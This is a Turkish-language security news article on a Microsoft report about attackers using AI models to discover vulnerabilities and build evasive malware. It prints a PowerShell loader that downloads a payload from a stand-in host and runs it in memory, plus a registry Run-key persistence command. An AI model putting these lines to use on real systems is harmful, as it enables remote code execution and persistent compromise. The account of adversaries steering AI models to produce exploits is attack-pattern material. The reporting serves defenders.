Dünyanın dört bir yanındaki güvenlik ekipleri, yazılım zayıflıklarını tespit etmek ve kötü amaçlı yükleri benzeri görülmemiş bir hızda oluşturmak için gelişmiş otomasyondan yararlanan yeni tür siber tehditlerle boğuşuyor.
Geçen yıl, rakipler makine odaklı iş akışlarını operasyonlarına entegre ederek fırsatçı suçluların ve iyi finanse edilen grupların sıfır günleri keşfetmesine ve minimum insan müdahalesiyle kötü amaçlı yazılım oluşturmasına olanak sağladı.
Bu evrim, karmaşık saldırılara yönelik giriş engelini önemli ölçüde azaltarak, bir zamanlar ulus devlet aktörleriyle sınırlı olan yetenekleri, motive olmuş herhangi bir siber suçluya kadar genişletiyor.
Microsoft Dijital Savunma Raporu, saldırganların artık sıkıcı kod incelemeleri veya toplu tarama yoluyla yararlanılabilir hataları manuel olarak aramadıklarını vurguluyor.
Bunun yerine, halka açık kod depolarında büyük ölçekli modeller eğitiyorlar, ardından modelleri belirli hedefler için kavram kanıtı istismarları oluşturmaya yönlendiriyorlar.
Buna paralel olarak, aynı otomatik işlem hatları, gizleme katmanları, özel komut ve kontrol rutinleri ve kalıcılık modülleri ekleyerek bu istismarları tam özellikli kötü amaçlı yazılım ailelerine dönüştürüyor.
Microsoft analistleri, bu uçtan uca otomasyonun, güvenlik açığı geri dönüş süresini haftalardan sadece saatlere düşürdüğünü ve Windows savunucularının kritik sistemlere yama yapmak zorunda kaldıkları süreyi önemli ölçüde kısalttığını belirtti.
Kuruluşlar bu değişen manzara üzerinde düşündükçe, geleneksel imzaya dayalı savunmaların azalan getiriler sunduğu açıkça ortaya çıkıyor.
Gerçek zamanlı tehdit avcılığı ve davranışa dayalı algılama, otomatik olarak oluşturulan tehditlere karşı koyacak şekilde gelişmelidir.
Microsoft araştırmacıları, imza açısından zararsız test kodundan ayırt edilemeyen özel kötü amaçlı yazılım türlerinin antivirüs motorlarından ve korumalı alan ortamlarından kaçarak kurumsal ağlarda sessizce dayanak oluşturduğu çok sayıda olay tespit etti.
.webp)
Güvenlik operasyon merkezleri (SOC’ler) artık yüksek hızlı saldırı oluşturma ve giderek daha fazla kaçan yüklerden oluşan çifte zorlukla karşı karşıya.
Enfeksiyon mekanizmasını anlamak
Otomatik enfeksiyon zincirine daha yakından bakıldığında, saldırganların kötü amaçlı kod dağıtmak ve etkinleştirmek için komut dosyası oluşturma ve düzenleme çerçevelerinden nasıl yararlandığı ortaya çıkar.
Başlangıçta, düşmanın yapay zeka modeli, geniş çapta konuşlandırılmış bir web çerçevesindeki seri durumdan çıkarma kusuru gibi, belirli bir kitaplığı veya uygulama bileşenini hedef alan bir istismar üretir.
Model daha sonra PowerShell veya Python’da yükü dinamik olarak getiren bir yükleyici betiği oluşturur: –
$url = "https://malicious.example.com/payload.bin"
$bytes = (New-Object Net.WebClient).DownloadData($url)
[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())Bu yükleyici komut dosyası, zararsız görünen belgelere enjekte edilir veya hedef odaklı kimlik avı e-postaları aracılığıyla sunulur ve statik savunmalardan kaçar.
Yükleyici yürütüldükten sonra disk tabanlı algılamayı atlayarak oluşturulan kötü amaçlı yazılımın şifresini çözer ve bellekte başlatır.
Kalıcılığı korumak için otomasyon hattı, zamanlanmış bir görevi kaydeden veya bir yedek kayıt defteri çalıştırma anahtarını ekleyen kodu ekler: –
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
-Name "SysUpdate" -Value "powershell -ExecutionPolicy Bypass -File %UserProfile%\update.ps1"Microsoft analistleri, bu tür komut dosyalarının çoğunun rastgele adlardan ve değişken atamalardan yararlanarak her kampanyanın benzersiz görünmesini sağladığını ve algılama mantığını daha da karıştırdığını belirledi.
Otomatik güvenlik açığı keşfi ile anında kötü amaçlı yazılım oluşturmanın bu birleşimi, siber saldırıda bir dönüm noktasına işaret ediyor.
Savunmacılar, anormal davranışların sürekli izlenmesine öncelik vermeli, sıkı uygulama izin listesi uygulamalı ve ortaya çıkan tehditleri silah haline getirilmeden önce azaltmak için hızlı yama düzenlemeyi benimsemelidir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
